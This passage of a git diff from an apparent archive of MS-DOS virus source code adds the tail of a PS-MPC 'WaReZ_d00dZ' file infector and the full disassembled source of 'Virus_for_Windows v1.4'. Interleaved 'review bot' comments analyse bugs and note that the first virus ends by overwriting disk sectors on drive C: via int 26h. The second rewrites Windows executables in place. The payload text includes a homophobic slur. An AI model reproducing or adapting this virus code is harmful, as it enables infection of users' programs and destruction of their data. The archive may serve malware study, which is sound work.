si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreEXIT: + movsw + + mov byte ptr [bp+numinfec],50; reset infection counter + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + mov ah,47h ; Get current directory + mov dl,0 ; Current drive + lea si,[bp+origdir] ; DS:SI->buffer + int 21h + mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR + + mov ax,3524h ; Get int 24 handler + int 21h ; to ES:BX + mov word ptr [bp+oldint24],bx; Save it + mov word ptr [bp+oldint24+2],es + mov ah,25h ; Set new int 24 handler + lea dx,[bp+offset int24] ; DS:DX->new handler + int 21h + push cs ; Restore ES + pop es ; 'cuz it was changed + 
+dir_scan: ; "dot dot" traversal + + lea dx,[bp+ovr_mask] + call infect_mask + lea dx,[bp+exe_mask] + call infect_mask + lea dx,[bp+com_mask] + call infect_mask + mov ah,3bh ; change directory + lea dx,[bp+dot_dot] ; "cd .." + int 21h + jnc dir_scan ; go back for mo! + +done_infections: + mov ah,2ah ; Get current date + int 21h + cmp dh,1 ; Check month + jb exit_virus + cmp cx,1992 ; Check year + jb exit_virus + cmp al,0 ; Check date of week + jae activate + +exit_virus: + mov ax,2524h ; Restore int 24 handler + lds dx,[bp+offset oldint24] ; to original + int 21h + push cs + pop ds + + mov ah,3bh ; change directory + lea dx,[bp+origdir-1] ; original directory + int 21h + + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + cmp sp,id-4 ; EXE or COM? + jz returnEXE +returnCOM: + int 27h + retn ; 100h is on stack +returnEXE: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti +returnOVR: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo +jmpsave dd ? ; Original CS:IP +stacksave dd ? ; Original SS:SP +jmpsave2 db ? ; Actually four bytes +save3 db 0cdh,20h,0 ; First 3 bytes of COM file +stacksave2 dd ? + +activate proc far + +start: + jmp short loc_1 + db 90h +data_2 db 0 +data_3 dw 2B1h + db 2 +data_4 dw 0 + db 'HEY!!! 
Blow ME, WaReZ FAGGOT' + db 1Ah +data_5 db 'You got sorta lucky!!!', 0Dh, 0Ah + db '$' +loc_1: + mov ah,0Fh + int 010h + xor ah,ah + int 010h + mov ax,0002h + mov cx,0100h + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov bx,0B800h + cmp al,2 + je loc_2 ; Jump if equal + cmp al,3 + je loc_2 ; Jump if equal + mov data_2,0 + mov bx,0B000h + cmp al,7 + je loc_2 ; Jump if equal + mov dx,offset data_5 ; ('Unsupported Video Mode') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + retn +loc_2: + mov es,bx + mov di,data_4 + mov si,offset data_6 + mov dx,3DAh + mov bl,9 + mov cx,data_3 + cld ; Clear direction + xor ax,ax ; Zero register + +locloop_4: + lodsb ; String [si] to al + cmp al,1Bh + jne loc_5 ; Jump if not equal + xor ah,80h + jmp short loc_20 +loc_5: + cmp al,10h + jae loc_8 ; Jump if above or = + and ah,0F0h + or ah,al + jmp short loc_20 +loc_8: + cmp al,18h + je loc_11 ; Jump if equal + jnc loc_12 ; Jump if carry=0 + sub al,10h + add al,al + add al,al + add al,al + add al,al + and ah,8Fh + or ah,al + jmp short loc_20 +loc_11: + mov di,data_4 + add di,data_1e + mov data_4,di + jmp short loc_20 +loc_12: + mov bp,cx + mov cx,1 + cmp al,19h + jne loc_13 ; Jump if not equal + lodsb ; String [si] to al + mov cl,al + mov al,20h ; ' ' + dec bp + jmp short loc_14 +loc_13: + cmp al,1Ah + jne loc_15 ; Jump if not equal + lodsb ; String [si] to al + dec bp + mov cl,al + lodsb ; String [si] to al + dec bp +loc_14: + inc cx +loc_15: + cmp data_2,0 + je loc_18 ; Jump if equal + mov bh,al + +locloop_16: + in al,dx ; port 3DAh, CGA/EGA vid status + rcr al,1 ; Rotate thru carry + jc locloop_16 ; Jump if carry Set +loc_17: + in al,dx ; port 3DAh, CGA/EGA vid status + and al,bl + jnz loc_17 ; Jump if not zero + mov al,bh + stosw ; Store ax to es:[di] + loop locloop_16 ; Loop if cx > 0 + + jmp short loc_19 +loc_18: + rep stosw ; Rep when cx >0 Store ax to es:[di] +loc_19: + mov 
cx,bp +loc_20: + jcxz loc_ret_21 ; Jump if cx=0 + loop locloop_4 ; Loop if cx > 0 + + +loc_ret_21: + + push dx + mov al,002h + mov cx,030h + cli + cwd + int 026h + pop dx + mov ax,04C00h + int 021h + +activate endp + jmp exit_virus + +creator db '[MPC]',0 ; Mass Produced Code Generator +virusname db '[WaReZ_d00dZ]',0 +author db '[pAgE]',0 + +infect_mask: + mov ah,4eh ; find first file + mov cx,7 ; any attribute +findfirstnext: + int 21h ; DS:DX points to mask + jc exit_infect_mask ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + cmp word ptr [bp+buffer],'ZM'; EXE? + jz checkEXE ; Why yes, yes it is! + cmp word ptr [bp+buffer],'FB'; EXE? + jz checkOVR ; Why yes, yes it is! +checkCOM: + mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA + mov bx,word ptr [bp+buffer+1]; get jmp location + add bx,heap-decrypt+3 ; Adjust for virus size + cmp ax,bx + je find_next ; already infected + jmp infect_com +checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe +checkOVR: cmp word ptr [bp+buffer+10h],idi ; is it already infected? 
+ jnz infect_ovr +find_next: + mov ah,4fh ; find next file + jmp short findfirstnext +exit_infect_mask: ret + +infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp finishinfection +infect_ovr: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr 
[bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h],idi + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp short finishinfection +infect_com: ; ax = filesize + mov cx,3 + sub ax,cx + lea si,[bp+offset buffer] + lea di,[bp+offset save3] + movsw + movsb + mov byte ptr [si-3],0e9h + mov word ptr [si-2],ax + add ax,103h + push ax ; needed later +finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,2ch ; Get current time + int 21h ; dh=sec,dl=1/100 sec + mov [bp+decrypt_value],dx ; Set new encryption value + lea di,[bp+code_store] + mov ax,5355h ; push bp,push bx + stosw + lea si,[bp+decrypt] ; Copy encryption function + mov cx,startencrypt-decrypt ; Bytes to move + push si ; Save for later use + push cx + rep movsb + + xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub + + lea si,[bp+write] ; Copy writing function + mov cx,endwrite-write ; Bytes to move + rep movsb + pop cx + pop si + pop dx ; Entry point of virus + push di + push si + push cx + rep movsb ; Copy decryption function + mov ax,5b5dh ; pop bx,pop bp + stosw + mov al,0c3h ; retn + stosb + + add dx,offset startencrypt - offset decrypt ; Calculate new + mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of + call code_store ; decryption + pop cx + pop di + pop si + rep movsb ; Restore decryption function + + mov ax,5701h ; Restore creation date/time + mov cx,word 
ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + dec byte ptr [bp+numinfec] ; One mo infection + jnz mo_infections ; Not enough + pop ax ; remove call from stack + jmp done_infections +mo_infections: jmp find_next + +open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + +attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + +write: + pop bx ; Restore file handle + pop bp ; Restore relativeness + mov ah,40h ; Write to file + lea dx,[bp+decrypt] ; Concatenate virus + mov cx,heap-decrypt ; # bytes to write + int 21h + push bx + push bp +endwrite: + +int24: ; New int 24h (error) handler + mov al,3 ; Fail call + iret ; Return control +data_6 db 9 + db 10h,0D2h,0C4h,0C4h,0BFh, 20h + db 0D6h,0C4h,0C4h,0BFh, 20h,0D6h + db 0C4h,0C4h,0BFh, 20h,0B7h + db 20h ; Data table (indexed access) + db 0D6h,0C4h,0D2h,0C4h,0BFh, 19h + db 03h,0D2h, 20h, 20h,0C2h, 20h + db 0D6h,0C4h,0C4h,0BFh, 20h,0D2h + db 20h, 20h,0C2h, 19h + dd 0DA20D203h ; Data table (indexed access) + db 20h, 20h,0D6h,0C4h,0C4h,0BFh + db 20h,0D6h,0C4h,0C4h,0BFh, 20h + db 0D2h, 20h,0D2h, 20h,0C2h, 20h + db 20h, 18h,0BAh, 20h, 20h,0B3h + db 20h,0BAh, 20h, 20h,0B3h, 20h + db 0BAh, 20h, 20h,0B3h, 20h,0BDh + db 19h, 02h,0BAh, 19h, 05h,0D3h + db 0C4h,0C4h,0B4h, 20h,0BAh, 20h + db 20h,0B3h, 20h,0BAh, 20h, 20h + db 0B3h, 19h, 03h,0C7h,0C4h,0C1h + db 0BFh, 20h,0BAh, 20h, 20h,0B3h + db 20h,0BAh, 20h, 20h,0B3h, 20h + db 0BAh, 20h,0BAh, 20h,0B3h, 20h + db 20h, 18h,0D0h,0C4h,0C4h,0D9h + db 20h,0D3h,0C4h,0C4h,0D9h, 20h + db 0D0h, 20h, 20h,0C1h, 19h, 04h + db 0D0h, 19h, 05h,0D3h,0C4h,0C4h + db 0D9h, 20h,0D3h,0C4h,0C4h,0D9h + db 20h,0D3h,0C4h,0C4h,0D9h, 19h + db 03h,0D0h, 20h, 20h,0C1h, 20h + db 0D0h, 20h, 20h,0C1h, 20h,0D3h + db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h + db 
0D0h,0C4h,0D9h, 20h, 20h, 18h + db 19h, 41h, 18h,0D6h,0C4h,0D2h + db 0C4h,0BFh, 20h,0D2h, 20h, 20h + db 0C2h, 20h,0D6h,0C4h,0C4h,0BFh + db 20h,0D6h,0C4h,0D2h,0C4h,0BFh + db 19h, 03h,0D2h,0C4h,0C4h,0BFh + db 20h,0C4h,0D2h,0C4h, 20h,0D2h + db 0C4h,0C4h,0BFh, 20h,0D6h,0C4h + db 0C4h,0BFh, 20h,0D6h,0C4h,0C4h + db 0BFh, 20h,0D2h, 20h, 20h,0C2h + db 19h, 02h,0C4h,0D2h,0C4h, 20h + db 20h,0D6h,0C4h,0BFh, 20h, 20h + db 18h, 20h, 20h,0BAh, 19h, 02h + db 0C7h,0C4h,0C4h,0B4h, 20h,0C7h + db 0C4h,0C4h,0B4h, 19h, 02h,0BAh + db 19h, 05h,0C7h,0C4h,0C4h,0D9h + db 20h, 20h,0BAh, 20h, 20h,0C7h + db 0C4h,0C2h,0D9h, 20h,0C7h,0C4h + db 0C4h,0B4h, 20h,0BAh, 19h, 03h + db 0D3h,0C4h,0C4h,0B4h, 19h, 03h + dd 0D30219BAh ; Data table (indexed access) + db 0C4h,0BFh, 20h, 20h, 18h, 20h + db 20h,0D0h, 19h, 02h,0D0h, 20h + db 20h,0C1h, 20h,0D0h, 20h, 20h + db 0C1h, 19h, 02h,0D0h, 19h, 05h + db 0D0h, 19h, 03h,0C4h,0D0h,0C4h + db 20h,0D0h, 20h,0C1h, 20h, 20h + db 0D0h, 20h, 20h,0C1h, 20h,0D3h + db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h + db 0C4h,0D9h, 19h, 02h,0C4h,0D0h + db 0C4h, 20h,0D3h,0C4h,0C4h,0D9h + db 20h, 20h, 18h, 19h, 41h, 18h + db 19h, 41h, 18h, 19h, 07h, 0Ch + db 1Bh,0C4h,0C4h,0D2h,0C4h,0C4h + db 20h,0D2h, 19h, 06h,0D2h, 19h + db 06h,0D2h, 1Ah, 04h,0C4h,0BFh + db 20h,0D6h, 1Ah, 05h,0C4h, 20h + db 0D6h, 1Ah, 04h,0C4h,0BFh, 20h + db 0D2h, 19h, 0Ah, 18h, 19h, 09h + db 0BAh, 19h, 02h,0BAh, 19h, 06h + db 0BAh, 19h, 06h,0BAh, 19h, 06h + db 0BAh, 19h, 06h,0BAh, 19h, 04h + db 0B3h, 20h,0BAh, 19h, 0Ah, 18h + db 19h, 09h,0BAh, 19h, 02h,0BAh + db 19h, 06h,0BAh, 19h, 06h,0C7h + db 0C4h,0C4h, 19h, 04h,0BAh, 19h + db 02h,0DAh,0C4h,0BFh, 20h,0C7h + db 1Ah, 04h,0C4h,0B4h, 20h,0BAh + db 19h, 0Ah, 18h, 19h, 09h,0BAh + db 19h, 02h,0BAh, 19h, 06h,0BAh + db 19h, 06h,0BAh, 19h, 06h,0BAh + db 19h, 04h,0B3h, 20h,0BAh, 19h + db 04h,0B3h, 20h,0BAh, 19h, 0Ah + db 18h, 19h, 07h,0C4h,0C4h,0D0h + db 0C4h,0C4h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D3h, 
1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 19h, 04h + db 0C1h, 20h,0D0h, 1Ah, 04h,0C4h + db 0D9h, 19h, 04h, 18h, 19h, 41h + db 18h, 19h, 41h, 18h + db ' ', 9, 1Bh, 'I am afraid that I' + db ' am going to have to smash your ' + db 'WaReZ, d00d!!!' + db 18h, 19h, 41h, 18h, 19h, 41h + db 18h + db 20h + db ' Go ahead! Call the police and t' + db 'ell them ', 0Ah, '[NuKe] ', 9, 'p' + db 'aid you a visit!' + db 18h + +data_1e equ 0A0h +exe_mask db '*.exe',0 +ovr_mask db '*.ovr',0 +com_mask db '*.com',0 +dot_dot db '..',0 +heap: ; Variables not in code +; The following code is the buffer for the write function +code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) +oldint24 dd ? ; Storage for old int 24h handler +backslash db ? +origdir db 64 dup (?) ; Current directory buffer +newDTA db 43 dup (?) ; Temporary DTA +numinfec db ? ; Infections this run +buffer db 1ah dup (?) ; read buffer +endheap: ; End of virus +end entry_point diff --git a/MSDOS/Virus.MSDOS.Unknown.wvir14.asm b/MSDOS/Virus.MSDOS.Unknown.wvir14.asm new file mode 100644 index 00000000..744f5354 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wvir14.asm 
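Review bot: In the PS-MPC prologue, `restoreEXE` falls straight through into `restoreOVR` because the generator's usual `jmp short restoreEXIT` is missing after its third `movsw`, so an EXE host pushes DS/ES twice and copies `jmpsave2` a second time. At `exit_virus` the single dispatch `cmp sp,id-4` / `jz returnEXE` then matches neither an EXE host (sp = id-8 after the double push) nor an OVR host (sp = idi-4), both of which fall into `returnCOM`, and the `returnOVR` block is never reached from anywhere. Since this is an archived sample the appropriate change is an annotation, not a repair: `; NOTE: restoreEXE lacks 'jmp short restoreEXIT' and falls into restoreOVR; exit_virus only tests id-4, so returnOVR is dead code and EXE/OVR hosts leave via returnCOM`. The trigger at `done_infections` is also effectively unconditional once the year is 1992 or later, because `cmp dh,1` / `jb exit_virus` (month is never below 1) and `cmp al,0` / `jae activate` (day of week is never below 0) can never skip the payload. That payload ends in a raw `int 026h` absolute-sector write with `al=2` (drive C:) and `cx=030h` sectors, which is destructive and should be called out in the file header for anyone handling the sample.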
@@ -0,0 +1,487 @@ + +PAGE 59,132 + +; +; +; WVIR14 +; +; Created: 1-Sep-92 +; Passes: 5 Analysis Options on: none +; +; + +data_11e equ 100h ;* +data_12e equ 140h ;* +data_13e equ 142h ;* +data_14e equ 144h ;* +data_15e equ 148h ;* +data_16e equ 14Ah ;* +data_17e equ 150h ;* +data_18e equ 16Eh ;* +data_19e equ 181h ;* +data_20e equ 19Ch ;* +data_21e equ 19Eh ;* +data_22e equ 1A0h ;* +data_23e equ 1A2h ;* + +;------------------------------------------------------------ seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_b + + db 249 dup (0) + +; +; +; Program Entry Point +; +; + + +wvir14 proc far + +start: + mov ax,cs + add ax,3Bh + mov ds,ax + cld ; Clear direction + push es + push ds + pop es + mov si,data_18e + mov di,data_19e + mov cx,0Dh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,data_17e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,17Bh + xor cx,cx ; Zero register + mov ah,4Eh +loc_1: + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + mov dx,data_18e + call sub_1 + mov ah,4Fh ; 'O' + jmp short loc_1 +loc_2: + mov dx,data_19e + call sub_2 + pop es + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code + +wvir14 endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + je loc_3 ; Jump if equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_4 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_3: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + 
+loc_ret_4: + retn +sub_1 endp + + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + jne loc_3 ; Jump if not equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_5 + call sub_6 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_3 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + call sub_8 + cmp word ptr [si],5A4Dh + jne loc_5 ; Jump if not equal + cmp word ptr [si+18h],40h + jb loc_5 ; Jump if below + mov ax,[si+3Ch] + mov dx,[si+3Eh] + call sub_16 + mov ds:data_20e,ax + mov ds:data_21e,dx + call sub_8 + cmp word ptr [si],454Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si+0Ch],302h + jne loc_5 ; Jump if not equal + cmp byte ptr [si+32h],4 + jne loc_5 ; Jump if not equal + cmp word ptr [si+36h],802h + jne loc_5 ; Jump if not equal + clc ; Clear carry flag + retn +loc_5: + stc ; Set carry flag + +loc_ret_6: + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,[si+16h] + mov dx,140h + call sub_7 + cmp word ptr ds:data_13e,3AEh + jb loc_ret_6 ; Jump if below + cmp byte ptr ds:data_14e,50h ; 'P' + jne loc_ret_6 ; Jump if not equal + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + cmp word ptr ds:data_16e,4A8h + jb loc_ret_6 ; Jump if below + mov ax,ds:data_12e + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + push word ptr ds:[144h] + pop word ptr ds:[1A2h] + and word ptr ds:[144h],0FEFFh + mov ax,[si+16h] + mov 
dx,140h + call sub_10 + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + push word ptr [si+14h] + pop word ptr ds:[1A0h] + mov word ptr [si+14h],100h + call sub_11 + mov ax,word ptr ds:[140h] + call sub_15 + push ds + push cs + pop ds + mov dx,100h + mov cx,2AEh + nop + call sub_12 + pop ds + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_12 + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + mov ax,ds:data_15e + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_9 + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push word ptr ds:data_23e + pop word ptr ds:data_14e + mov ax,[si+16h] + mov dx,140h + call sub_10 + push word ptr ds:data_22e + pop word ptr [si+14h] + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + call sub_11 + call sub_13 + sub ax,0A8h + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + mov ax,ds:data_15e + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + pop dx + pop ax + sub ax,2AEh + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + mov ax,word ptr ds:[140h] + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + pop dx + pop ax + call sub_16 + mov cx,0 + call sub_12 + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_7 + +; External Entry into Subroutine + +sub_8: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_9: +loc_7: + mov ah,3Fh + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + 
mov cx,8 + jmp short loc_8 + +; External Entry into Subroutine + +sub_11: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_12: +loc_8: + mov ah,40h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + add ax,ds:data_20e + adc dx,ds:data_21e + jmp short loc_9 + +; External Entry into Subroutine + +sub_15: + mov cx,10h + mul cx ; dx:ax = reg * ax + add ax,100h + adc dx,0 + jmp short loc_9 + db 33h,0C0h, 99h + +; External Entry into Subroutine + +sub_16: +loc_9: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_14 endp + + ;* No entry point to code + xchg cx,dx + xchg ax,dx + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn + db ' Virus_for_Windows v1.4 ' + db 259 dup (0) + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'bbbbbbbbccccccccdddddddddddddddd' + db 'ddddddddddddddddddddddddddd*.EXE' + db 0 + db 'eeeeeeeeeeeee' + db 00h, 00h, 80h, 00h, 00h, 00h + db 5Ch, 00h, 00h, 00h + db 6Ch + db 11 dup (0) + db 4Dh, 4Bh, 39h, 32h + db 8 dup (0) + +seg_a ends + + + +;------------------------------------------------------ stack_seg_b ---- + +stack_seg_b segment word stack 'STACK' + + db 8192 dup (0) + +stack_seg_b ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm b/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm new file mode 100644 index 00000000..744f5354 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm 
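Review bot: The auto-generated comment on the `int 21h` at `loc_1` (`ah=function 4Fh ; find next filename match`) is wrong for the first pass: the loop is entered with `mov ah,4Eh` (find-first) set just above it, and `4Fh` is only loaded after `call sub_1`; suggest `; 4Eh find-first on entry, 4Fh find-next on later passes`. The file header is Sourcer boilerplate and never says what `sub_3` accepts, which is the whole targeting logic: an `MZ` header whose word at 18h is >= 40h, then at the offset read from 3Ch/3Eh a second header starting `NE` with word 0Ch == 302h, byte 32h == 4 and word 36h == 802h — apparently a filter for Windows NE executables with particular flag and alignment values, which a header comment should spell out (hedged until checked against an NE header layout). `sub_1` then rewrites matching `*.EXE` in place (`3D02h` open, `40h` writes through `sub_12`) and puts the timestamp back with `5701h`, so file date/time is not an infection indicator for this family; that belongs in the header too.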
@@ -0,0 +1,487 @@ + +PAGE 59,132 + +; +; +; WVIR14 +; +; Created: 1-Sep-92 +; Passes: 5 Analysis Options on: none +; +; + +data_11e equ 100h ;* +data_12e equ 140h ;* +data_13e equ 142h ;* +data_14e equ 144h ;* +data_15e equ 148h ;* +data_16e equ 14Ah ;* +data_17e equ 150h ;* +data_18e equ 16Eh ;* +data_19e equ 181h ;* +data_20e equ 19Ch ;* +data_21e equ 19Eh ;* +data_22e equ 1A0h ;* +data_23e equ 1A2h ;* + +;------------------------------------------------------------ seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_b + + db 249 dup (0) + +; +; +; Program Entry Point +; +; + + +wvir14 proc far + +start: + mov ax,cs + add ax,3Bh + mov ds,ax + cld ; Clear direction + push es + push ds + pop es + mov si,data_18e + mov di,data_19e + mov cx,0Dh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,data_17e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,17Bh + xor cx,cx ; Zero register + mov ah,4Eh +loc_1: + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + mov dx,data_18e + call sub_1 + mov ah,4Fh ; 'O' + jmp short loc_1 +loc_2: + mov dx,data_19e + call sub_2 + pop es + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code + +wvir14 endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + je 